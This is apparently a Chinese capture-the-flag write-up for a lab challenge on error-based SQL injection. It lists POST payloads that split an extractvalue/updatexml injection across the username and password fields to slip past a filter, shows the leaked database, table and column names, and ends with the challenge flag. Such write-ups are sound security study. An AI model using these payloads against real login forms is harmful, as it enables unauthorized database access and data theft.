加了料的报错注入SQL
地址: http://ctf5.shiyanbar.com/web/baocuo/index.php
参考资料:https://www.jianshu.com/p/95f18a32ec7b https://blog.****.net/he_and/article/details/80572740
源码中的有用信息:
要用post提交username和password,所以用burp
爆出当前库:username=‘or extractvalue /&password=/(1, concat(0x5c,(select database()))) or’
XPATH syntax error: ‘\error_based_hpf’
爆库:username=’ or updatexml/&password=1/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema regexp database()),0x7e),1) or ’
XPATH syntax error: ‘ffll44jj,users’【error_based_hpf库中有ffll44jj,users两张表】
爆表:username=’ or updatexml/&password=1/(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema regexp database() and table_name regexp 0x66666c6c34346a6a),0x7e),1) or ’
XPATH syntax error: ‘value’【ffll44jj表中的列,表名用了16进制】
爆列:username=’ or updatexml/&password=1/(1,concat(0x7e,(select value from ffll44jj),0x7e),1) or ’
XPATH syntax error: ‘flag{err0r_b4sed_sqli_+_hpf}’